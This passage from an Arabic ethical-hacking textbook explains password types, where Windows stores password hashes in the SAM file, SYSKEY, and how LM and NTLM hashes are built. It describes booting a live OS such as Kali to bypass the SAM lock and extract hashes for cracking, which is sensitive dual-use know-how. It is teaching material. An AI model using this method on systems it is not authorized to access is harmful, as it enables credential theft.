‫أن ﺗﺳﺗوﻓﻲ ﻣﺗطﻠﺑﺎت إﻋدادات ﻧﮭﺞ اﻟﺗﻌﻘﯾد‪ .‬ﯾﺟب أن ﺗﻛون اﻷﺣرف ﻛﻠﻣﺔ ﻣرور ﻣزﯾﺞ ﻣن اﻷﺣرف اﻷﺑﺟدﯾﺔ واﻟرﻗﻣﯾﺔ‪ .‬ﺗﺗﻛون ﻣن أﺣرف‬
‫أﺑﺟدﯾﺔ رﻗﻣﯾﺔ ﻣن اﻟﺣروف واﻷرﻗﺎم وﻋﻼﻣﺎت اﻟﺗرﻗﯾم‪ ،‬واﻟرﯾﺎﺿﯾﺔ وﻏﯾرھﺎ ﻣن اﻟرﻣوز اﻟﺗﻘﻠﯾدﯾﺔ‪ .‬ﻓﺎﻧظر اﻟﻰ ﺑﻌض اﻣﺛﻠﺔ ﻛﻠﻣﺎت اﻟﻣرو ﻛﺎﻻﺗﻰ‪:‬‬
‫‪- Passwords that contain letters, special characters, and numbers: ap1@52‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف واﺷﻛﺎل ﺧﺎﺻﮫ وأرﻗﺎم‪.‬‬
‫‪- Passwords that contain only numbers: 23698217‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ارﻗﺎم ﻓﻘط‪.‬‬
‫)‪- Passwords that contain only special characters :&*#@!(%‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي اﺷﻛﺎل ﺧﺎﺻﮫ ﻓﻘط‪.‬‬
‫‪- Passwords that contain letters and numbers: meet123‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف وأرﻗﺎم‪.‬‬
‫‪- Passwords that contain only letters: PUTHMYDE‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف ﻓﻘط‪.‬‬
‫‪- Passwords that contain only letters and special characters: bob@&ba‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺣروف واﺷﻛﺎل ﺧﺎﺻﮫ‪.‬‬
‫‪- Passwords that contain only special characters and numbers: 123@$4‬‬
‫ﻣﺛﺎل ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ اﺷﻛﺎل ﺧﺎﺻﮫ وأرﻗﺎم‪.‬‬
‫ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﻟﮭدف ﻣن ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ھو اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﻌطﯾﻧﺎ اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ اﻟﻰ اﻟﻧظﺎم اﻟﮭدف ﻣﻊ‬
‫ﺻﻼﺣﯾﺎت اﻋﻠﻰ‪ ،‬وﻟﻛن ﻗﺑل ذﻟك ﺳوف ﻧﺗطرق اﻟﻰ طرﯾﻖ ﻣﺻﺎدﻗﮫ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل وطرق ﺗﺧزﯾﻧﮭﺎ ﻟﻛﻠﻣﺎت اﻟﻣرور‪.‬‬

‫‪Microsoft Authentication‬‬

‫ﻣﻌظم اﻟﻧظم اﻟﺗﻲ ﺗﺳﺗﺧدم آﻟﯾﺔ ﻣﺻﺎدﻗﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺗﺣﺗﺎج إﻟﻰ ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ھذه )أو اﻟﮭﺎش اﻟﺧﺎﺻﺔ ﺑﮭم( ﻣﺣﻠﯾﺎ ﻋﻠﻰ اﻟﺟﮭﺎز‪ .‬ھل‬
‫ھذا ﺻﺣﯾﺢ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل )وﯾﻧدوز‪ ،‬ﻟﯾﻧﻛس‪ ،‬وﺳﯾﺳﻛو ‪ ،(IOS‬وأﺟﮭزة اﻟﺷﺑﻛﺔ )اﻟراوﺗر واﻟﺳوﯾﺗﺷﺎت(‪.‬‬

‫‪SAM Database‬‬
‫ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺗﺧزن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة )‪ (Encrypted Password Hash‬ﻓﻲ ﻣﻛﺎن واﺣد‪ .‬ﻓﻲ اﻷﻧظﻣﺔ اﻟﻣﺳﺗﻧدة إﻟﻰ‬
‫‪ ،Windows‬ﯾﺗم ﺗﺧزﯾن اﻟﮭﺎش ﻓﻲ ﻣﻠف ﺧﺎص ﯾﺳﻣﻰ )‪.(SAM‬‬
‫ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬ھﻲ اﺧﺗﺻﺎر ﻠ ‪ .Security Accounts Manager database‬ﺗﺳﺗﺧدم ﻣن ﻗﺑل وﯾﻧدوز ﻹدارة ﺣﺳﺎﺑﺎت‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﺷﻛل اﻟﮭﺎش )‪) (hashed format‬ذات اﺗﺟﺎه واﺣد(‪ .‬ﺣﯾث ﻻ ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر أﺑدا ﻓﻲ ﺷﻛﻠﮭﺎ‬
‫اﻟﻌﺎدي‪ .‬ﻟﻛن ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﺷﻛل اﻟﮭﺎش ﻟﯾﺗم ﺣﻣﺎﯾﺗﮭﺎ ﻣن اﻟﮭﺟﻣﺎت‪ .‬ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻛﻣﻠف رﺟﯾﺳﺗري)‪. (registry file‬‬
‫اﻷﻧظﻣﺔ اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ ‪ Windows NT‬ﺑﻣﺎ ﻓﻲ ذﻟك وﯾﻧدوز ‪ ،2000‬واﻻﺻدارات اﻟﺗﻲ ﺗﻠﯾﮭم‪ ،‬ﯾﺗم وﺿﻊ اﻟﻣﻠف ‪ SAM‬ﻓﻲ اﻟﻣﺳﺎر‬
‫)\‪ .(C:\Windows\System32\Config‬اﻵن ﺑﻌد أن ﺗﻌرﻓﻧﺎ ﻋﻠﻰ ﻣوﻗﻊ اﻟﻣﻠف‪ ، SAM‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻻﺳﺗﺧراج ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﻣن‬
‫اﻟﻣﻠف‪ .‬وﻷن اﻟﻣﻠف ‪ SAM‬ﯾﺣﻣل ﺑﻌض اﻟﻣﻌﻠوﻣﺎت اﻟﮭﺎﻣﺔ ﺟدا‪ ،‬ﻓﺄن ﻣﺎﯾﻛروﺳوﻓت ﻗد أﺿﺎﻓت ﺑﺣﻛﻣﺔ ﺑﻌض اﻟﻣﯾزات اﻷﻣﻧﯾﺔ اﻹﺿﺎﻓﯾﺔ‬
‫ﻟﻠﻣﺳﺎﻋدة ﻓﻲ ﺣﻣﺎﯾﺔ ھذا اﻟﻣﻠف‪.‬‬
‫اﻟﺣﻣﺎﯾﺔ اﻷوﻟﻰ ھﻲ أن اﻟﻣﻠف ‪ SAM‬ﯾﺗم ﻏﻠﻘﮫ ﻓﻲ اﻟﺣﻘﯾﻘﺔ ﻋﻧد ﺑداﯾﺔ ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ھذا ﯾﻌﻧﻲ أﻧﮫ ﻓﻲ ﺣﯾن ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾس‬
‫ﻟدﯾﻧﺎ اﻟﻘدرة ﻋﻠﻰ ﻓﺗﺢ أو ﻧﺳﺦ اﻟﻣﻠف ‪ .SAM‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ھذا اﻟﻘﻔل‪ ،‬ﯾﺗم ﺗﺷﻔﯾر اﻟﻣﻠف ‪ SAM‬ﻛﺎﻣل وﻏﯾر ﻗﺎﺑل ﻟﻠﻌرض‪.‬‬
‫ﻟﺣﺳن اﻟﺣظ‪ ،‬ھﻧﺎك طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﻘﯾود ﻋﻠﻰ ﺣد ﺳواء‪ .‬ﻓﺎذا ﻛﺎن ﻟدﯾﻧﺎ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﻧظﺎم‪ ،‬ﻓﺄن أﺑﺳط طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﺣﻣﺎﯾﺔ‬
‫ھو اﺳﺗﺧدام ﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻣﺛل ﻛﺎﻟﻲ)‪ . (Live OS‬ﺑواﺳطﺔ اﺳﺗﺧدام ﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪ ،‬ﻓﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺟﺎوز‬
‫ﺗﺄﻣﯾن اﻟوﯾﻧدوز ﻟﻠﻣﻠف ‪ .SAM‬ھذا ﻣﻣﻛن ﻷن ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻻ ﯾﺑدأ‪ ،‬ﻓﺎذا اﻟﻘﻔل ﻟن ﯾﻌﻣل أﺑدا‪ ،‬وﻧﻛون أﺣرار ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻣﻠف‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪314‬‬

‫‪ .SAM‬ﻟﻸﺳف‪ ،‬ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف ‪ ،SAM‬ﻟذﻟك ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﺳﺗﺧدام أداة ﻟﻠوﺻول إﻟﻰ اﻟﮭﺎش‪ .‬ﻟﺣﺳن اﻟﺣظ‪ ،‬ﯾوﺟد اﻟﻌدﯾد ﻣن‬
‫اﻷدوات ﻟﻠوﺻول اﻟﻰ اﻟﮭﺎش وﺗرﺟﻣﻧﮫ اﻟﻰ ﻧص ﻋﺎدى‪ .‬أﯾﺿﺎ ﯾﻣﻛن ﻧﺳﺦ ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ SAM‬ﻋﻠﻰ اﻟﻘرص ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت ﻣﺧﺗﻠﻔﺔ‪.‬‬
‫ﻋرﺿت ﺷرﻛﺔ ﻣﺎﯾﻛروﺳوﻓت وظﯾﻔﺔ ‪ SYSKEY‬ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ‪ Windows NT 4.0‬ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺣﺳﯾن أﻣن ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ‪SAM‬‬
‫ﺿد اﻟﺑرﻣﺟﯾﺎت اﻟﻣﺗواﺟد ﺣﺎﻟﯾﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫ﺗﻘوم اداة ‪ SYSKEY‬ﻋﻠﻰ ﺗﺷﻔﯾر ﻣﻌﻠوﻣﺎت ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ ﻣرور ﻣدﯾر أﻣن اﻟﺣﺳﺎﺑﺎت )‪ (SAM‬اﻟﺗﻲ ﺗﺳﺗﺧدم داﻟﺔ اﻟﮭﺎش ﻓﻲ ﻧظﺎم‬
‫وﯾﻧدوز واﻟﺗﻲ ﺗﺳﺗﺧدم ﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر ‪ 128‬ﺑت‪ .‬ﻛﺎﻧت أداة ‪ SYSKEY‬ﻣﯾزة اﺧﺗﯾﺎرﯾﺔ ﻓﻲ ﻧظﺎم وﯾﻧدوز إن ﺗﻲ ‪ .4.0‬وﻛﺎن ﻣن اﻟﻣﻔﺗرض ﻟﮭﺎ‬
‫ان ﺗﻘوم ﺑﺣﻣﺎﯾﺔ ﻣﻌﻠوﻣﺎت ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ ﻣرور ﻣدﯾر أﻣن اﻟﺣﺳﺎﺑﺎت )‪ (SAM‬ﻟﻠﺣﻣﺎﯾﺔ ﻣن ھﺟﻣﺎت اﻻﺧﺗراق داﺧل اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ وﻟﺗﺑﻘﻰ‬
‫اﻟﻣﻌﻠوﻣﺎت آﻣﻧﺔ ﺣﺗﻰ ﻟو ﺗم ﻧﺳﺧﮭﺎ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﻲ دﯾﺳﻣﺑر ﻣن ﻋﺎم ‪ 1999‬م ﻋﺛر ﻓرﯾﻖ أﻣﻧﻲ ﻣن ‪BindView‬ﻋﻠﻰ ﺛﻐرة أﻣﻧﯾﺔ ﻓﻲ اﻷداة‬
‫ﺗﺟﻌل ﻣن اﻟﻣﻣﻛن اﻻﺧﺗراق ﺣﺗﻰ داﺧل اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﺑﺎﺳﺗﺧدام ﻧوع ﻣﻌﯾن ﻣن أداة ﺗﺣﻠﯾل اﻟﺷﻔرات‪ . cryptanalytic‬وھذا ﯾﺗﯾﺢ اﻻﺧﺗراق‬
‫ﻣن ﻧوع ‪ brute force‬اﻟذي ﯾﺳﺗﮭدف أي ﺿﻌف ﻓﻲ ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﻔرة‪.‬‬
‫ﻓﯾﻣﺎ ﺑﻌد‪ ،‬ﺗﻌﺎوﻧت ﻣﺎﯾﻛروﺳوﻓت ﻣﻊ ﻓرﯾﻖ ‪ BindView‬ﻟﺗﺳوﯾﺔ ھذه اﻟﻣﺷﻛﻠﺔ اﻟﺗﻲ ﻋرﻓت ﻻﺣﻘﺎ ﺑﺎﺳم ﺧﻠل ﺳﯾﺳﻛﻲ '‪ 'Syskey Bug‬وأﻋﻠن‬
‫ﺑﻌد ذﻟك أن اﻻداة ‪ Syskey‬آﻣﻧﺔ ﺑﺎﻟﻘدر اﻟﻛﺎﻓﻲ ﻟﺻد اي ﻧوع ﻣن اﻻﺧﺗراﻗﺎت‪.‬‬
‫ﺣﺗﻰ ﻟو ﺗم اﻛﺗﺷﺎف اﻟﻣﺣﺗوﯾﺎت ﻣن ﻗﺑل ﺑﻌض اﻟﺣﯾل‪ ،‬ﻓﺎﻧﮫ ﯾﺗم ﺗﺷﻔﯾر اﻟﻣﻔﺎﺗﯾﺢ ﺑﺎﺳﺗﺧدام اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد‪ ،‬ﻣﻣﺎ ﯾﺟﻌل ﻣن اﻟﺻﻌب‬
‫ﻛﺳره‪ .‬أﯾﺿﺎ‪ ،‬ﺑﻌض اﻹﺻدارات ﻟدﯾﮭﺎ ﻣﻔﺗﺎح ﺛﺎﻧوي‪ ،‬ﻣﻣﺎ ﯾﺟﻌل اﻟﺗﺷﻔﯾر ﻣﺣددة ﻟﮭذه اﻟﻧﺳﺧﺔ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل‪.‬‬
‫ھذا اﻟﻣﻠف ﯾﻣﻛن اﯾﺟﺎده ﻣن ﺧﻼل ھذا اﻟﻣﺳﺎر)‪ (%SYSTEMROOT%\system32\config‬وﻟﻛن ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﻧﮫ ﻻ ﯾﻣﻛن اﻟﺗﻌدﯾل‬
‫ﻓﯾﮫ او ﻗراءﺗﮫ او ﻧﺳﺧﮫ طﺎﻟﻣﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻌﻣل‪.‬‬
‫ﻟﻠﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن ھذا اﻟﻣﻠف ﯾﻣﻛن اﻻطﻼع ﻋﻠﯾﮫ ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://technet.microsoft.com/library/cc723740.aspx‬‬
‫ﻟﻠﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﮭﺎش ﯾﻣﻛن اﻻطﻼع ﻋﻠﯾﮫ ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://en.wikipedia.org/wiki/Cryptographic_hash_function‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻘوم ﺑﺗﺧزﯾن ﺑﯾﺎﻧﺎت اﻟﺗﺳﺟﯾل ﻓﻲ اﻟﻣﻠف ‪ ،SAM‬ﻟﻛن ﯾوﺟد اﺳﺗﺛﻧﺎء اﻧﮫ ﻋﻧد رﺑط اﻟﺟﮭﺎز ﺑﺎل‬
‫‪ Active Directory‬ﻓﺎﻧﮫ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت)‪. (Active Directory‬‬
‫ﻛﯿﻒ ﯾﺘﻢ ﺗﺨﺰﯾﻦ ھﺎش ﻛﻠﻤﺔ اﻟﻤﺮور ﻓﻲ اﻟﻤﻠﻒ ‪(How Hash Passwords Are Stored in Window SAM) SAM‬؟‬

‫ﯾﺗم ﺗﺧزﯾن ﺳﺟﻼت اﻟﻣﺳﺗﺧدم ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت )‪ (SAM‬أو ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ .Active Directory‬وﯾرﺗﺑط ﻛل ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﻊ اﺛﻧﯾن‬
‫ﻣن ﻛﻠﻣﺎت ﻣرور‪ :‬اﻷوﻟﻰ ‪ LAN Manager-compatible password‬واﻟﺛﺎﻧﯾﺔ ‪ .Windows password‬ﻛل ﻛﻠﻣﺔ ﻣرور ﯾﺗم‬
‫ﺗﺷﻔﯾرھﺎ وﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬أو ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪.Active Directory‬‬

‫‪ The LAN Manager-compatible password‬ﺗﻛون ﻣﺗواﻓﻘﺔ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗﺳﺗﺧدم ‪ .LM hash‬ﻛﻠﻣﺔ اﻟﻣرور ھذه ﻗﺎﺋﻣﮫ‬
‫ﻋﻠﻰ ‪ .the original equipment manufacturer (OEM) character‬ﻛﻠﻣﺔ اﻟﻣرور ھذه ﻟﯾﺳت ﺣﺳﺎﺳﺔ ﻟﺣﺎﻟﺔ اﻷﺣرف‪ ،‬وﯾﻣﻛن‬
‫أن ﯾﺻل إﻟﻰ ‪ 14‬ﺣرﻓﺎ ً‪ .‬ﯾﻌرف أﯾﺿﺎ إﺻدار ‪ OWF‬ﻟﻛﻠﻣﺔ اﻟﻣرور ھذه ب ‪ LAN Manager OWF‬أو ‪ .ESTD‬وﯾﺗم ﺗﺷﻔﯾر ﻛﻠﻣﺔ‬
‫اﻟﻣرور ھذه ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر ‪.DES‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪315‬‬

‫‪ (NTLM) Windows password‬ﯾﺳﺗﻧد إﻟﻰ ﻣﺟﻣوﻋﺔ أﺣرف ‪ .Unicode‬ﻛﻠﻣﺔ اﻟﻣرور ھذه ﺣﺳﺎس ﻟﺣﺎﻟﺔ اﻷﺣرف‪ ،‬وﯾﻣﻛن أن ﺗﺻل‬
‫إﻟﻰ ‪ 128‬ﺣرﻓﺎ ً‪ .‬ﯾﻌرف أﯾﺿﺎ إﺻدار ‪ OWF‬ﻣن ﻛﻠﻣﺔ اﻟﻣرور ھذه ب ‪ .Windows OWF‬ﻛﻠﻣﺔ اﻟﺳر ھذه ﯾﺗم ﺣﺳﺎﺑﮭﺎ ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ‬
‫اﻟﺗﺷﻔﯾر ‪.RSA MD--4‬‬
‫ﯾﺗم ﺗﻌطﯾل إﻧﺷﺎء وﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻋﻠﻰ ھﯾﺋﺔ ‪ valid LM hash‬ﻓﻲ اﻟﻌدﯾد ﻣن إﺻدارات اﻟوﯾﻧدوز‪ .‬ھذا ھو اﻹﻋداد اﻻﻓﺗراﺿﻲ ﻟﻧظﺎم‬
‫اﻟﺗﺷﻐﯾل ‪ Windows Vista‬و‪ LM hash .Windows 7‬ﯾﻣﻛن أن ﯾﻛون ﻓﺎرﻏﺎ ﻓﻲ اﻹﺻدارات اﻟﺗﻲ ﯾﻛون ﻓﯾﮭﺎ ‪ LM hash‬ﻏﯾر ﻣﻔﻌل‬
‫)‪ .(disabled‬ﺗﺣدﯾد اﻟﺧﯾﺎر ﻹزاﻟﺔ ‪ LM hash‬ﺗﻣﻛن ﻓﺣوﺻﺎت إﺿﺎﻓﯾﺔ ﺧﻼل ﻋﻣﻠﯾﺔ ﺗﻐﯾر ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬وﻟﻛﻧﮫ ﻻ ﯾزﯾل ﻗﯾﻣﺔ ‪LM hash‬‬
‫ﻣوﺟودة ﻓﻲ اﻟﻣﻠف ‪ .SAM‬ﺗﻔﻌﯾل ﺧﯾﺎر اﻟﻔﺣوﺻﺎت إﺿﺎﻓﯾﺔ ﯾﺧزن ﻗﯾﻣﺔ "‪ "dummy‬ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬وﻟﯾس ﻟﮫ ﻋﻼﻗﺔ ﺑﻛﻠﻣﺔ ﻣرور‬
‫اﻟﻣﺳﺗﺧدم وﻧﻔﺳﮫ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺟﻣﯾﻊ ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬

‫ﻻ ﯾﻣﻛن ﺣﺳﺎب ‪ LM hash‬ﻟﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗزﯾد ﻋن ‪ 14‬ﺣرﻓﺎ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﺗم ﺗﻌﯾﯾن ﻗﯾﻣﺔ ‪ LM hash‬إﻟﻰ اﻟﻘﯾﻣﺔ "‪ "dummy‬ﻋﻧد ﯾﺿﻊ‬

‫اﻟﻣﺳﺗﺧدم أو ﻣﺳؤول اﻟﻧظﺎم ﻛﻠﻣﺔ ﻣرور أﻛﺛر ﻣن ‪ 14‬ﺣرﻓﺎ‪.‬‬


‫ﻣﺎ ھﻮ )‪LAN Manager hash (LM hash‬؟‬

‫‪ The LAN manager hash‬ھو اﻟﮭﺎش اﻷوﻟﻰ او اﻟرﺋﯾﺳﻲ اﻟذى ﯾﺳﺗﺧدﻣﮫ ﻛل ﻣن ‪ Microsoft LAN Manager‬و ‪Microsoft‬‬
‫‪ Windows‬ﻟﺗﺧزﯾن ﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدﻣﯾن ذات طول ﺣﺗﻰ ‪ 14‬ﺣرﻓﺎ )‪ .(length up to 14 character‬ﻣﺳﺗﺧدم ﻓﻲ ﺟﻣﯾﻊ‬
‫إﺻدارات ﻣﺎﯾﻛروﺳوﻓت وﯾﻧدوز ﻗﺑل إﻟﻰ‪ . Windows NT‬واﺳﺗﻣرت ﻓﻲ اﻹﺻدار اﻷﺣدث ﻣن ‪ Windows‬ﻣن أﺟل اﻟﺗواﻓﻘﯾﺔ‪ ،‬وﻟﻛن ﯾﺗم‬
‫اﻟﺗوﺻﯾﺔ ﻣن ﻗﺑل ﻣﺎﯾﻛروﺳوﻓت ﻟﻠﻣﺳﺋول ﻟﯾﺗم إﯾﻘﺎﻓﮫ‪.‬‬
‫‪ Microsoft Windows NT‬ﯾﻌﻣل ﻋﻠﻰ ﺗﺧزﯾن ﻧوﻋﯾن ﻣن ﻛﻠﻣﺎت اﻟﻣرور‪ LAN Manager (LM) password :‬و ‪Windows NT‬‬
‫‪ .password‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻟﻧﻔﺗرض ان ﻛﻠﻣﺔ اﻟﺳر ھو '‪ .‘ 123456qwerty‬ﻋﻧدﻣﺎ ﯾﺗم ﺗﺷﻔﯾر ﻛﻠﻣﺔ اﻟﻣرور ھذه ﻣﻊ ﺧوارزﻣﯾﺔ ‪،LM‬‬
‫ﻓﺎﻧﮫ ﯾﺗم ﺗﺣوﯾﻠﮭﺎ أوﻻ إﻟﻰ أﺣرف ﻛﺑﯾرة‪ .‘ 123456QWERTY’ :‬إذا ﻛﺎن طول ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾس ‪ 14‬ﺣرﻓﺎ‪ ،‬ﻓﺎﻧﮫ ﯾﺗم ﺗﻌﺑﺋﺔ ﻣﻊ أﺣرف‬
‫ﻓﺎرﻏﺔ )‪ (Null\blank character‬ﻟﺟﻌل طوﻟﮭﺎ ‪ 14‬ﺣرﻓﺎ‪ .‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﻔﺗرض ان ﺗﺻﺑﺢ اﻟﻛﻠﻣﺔ ﻛﺎﻻﺗﻰ '_‪.’123456QWERTY‬‬
‫ﻗﺑل ﺗﺷﻔﯾر‪ ،‬ﯾﺗم ﺗﻘﺳﯾم اﻷﺣرف ‪ 14‬ﻣن ﻛﻠﻣﺎت اﻟﻣرور إﻟﻰ ﻧﺻﻔﯾن ذات ﻣﺳﺎﺣﺔ ‪ .7 byte‬وھذا ﯾﻌﻧﻲ ﺳﻠﺳﻠﺔ اوﻟﻰ ﺳﺑﻌﺔ ﺑﺎﯾت ﻣﻊ‬
‫’‪ ‘123456Q‬وﺳﻠﺳﻠﺔ ﺛﺎﻧﯾﺔ ﺳﺑﻌﺔ اﻟﺑﺎﯾت ﻣﻊ ' _‪ .‘ WERTY‬ﺛم ﯾﺗم ﺗﺷﻔﯾر ﻛل ﺳﻠﺳﻠﺔ ﻋﻠﻰ ﺣدة واﻟﻧﺗﺎﺋﺞ ﯾﻛون ﻣﺗﺻﻼ ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻣن ﻛل ﻧﺻف اﻟﺳﺑﻌﺔ ﺑﺎﯾت‪ ،‬ﯾﺗم ﺗﺷﯾد ﻣﻔﺗﺎح ‪ DES‬ﺛﻣﺎﻧﯾﺔ ﺑﺎﯾت‪ .‬ﯾﺗم ﺗﺷﻔﯾر ﻣﻔﺗﺎح ‪ DES‬ﺛﻣﺎﻧﯾﺔ ﺑﺎﯾت ﻣﻊ " ‪ ." magic number‬ﺛم ﯾﺗم‬
‫ﺗوﺻﯾل ﻧﺗﺎﺋﺞ اﻟﺗﺷﻔﯾر ﻣﻊ " ‪ " magic number‬ﻟﺗﻛوﯾن ھﺎش ذات اﺗﺟﺎه واﺣد ﻣن ‪ 16‬ﺑﺎﯾت‪ .‬ھذه اﻟﻘﯾﻣﺔ ھﻲ اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد‬
‫)‪(LAN Manager‬ﻟﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﺣﯾث ﯾﺗم اﺷﺗﻘﺎق ال ‪8‬ﺑﺎﯾت اﻷوﻟﻰ ﻣن ‪ 7‬أﺣرف اﻷوﻟﻰ ﻟﻛﻠﻣﺔ اﻟﻣرور وﯾﺗم اﺷﺗﻘﺎق ‪ 8‬ﺑﺎﯾت اﻟﺛﺎﻧﯾﺔ ﻣن‬
‫ﺧﻼل اﻟﺣرف ‪ 8‬أﺣرف ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻛون ﻣن ‪ 14‬ﺣرف‪ .‬ﻣﻌﺎ ﯾﻘوﻣوا ﺑﺗﺷﯾﯾد ﻗﯾﻣﺔ اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد ذات اﻟطول ‪ 16‬ﺑﺎﯾت‪ .‬ھذا‬
‫ﻗﯾﻣﺔ اﻟﮭﺎش ﻟﻛﻠﻣﺔ ﻣرور ﻻ ﺗﺗﺟﺎوز ‪ 14‬ﺣرف‪.‬‬
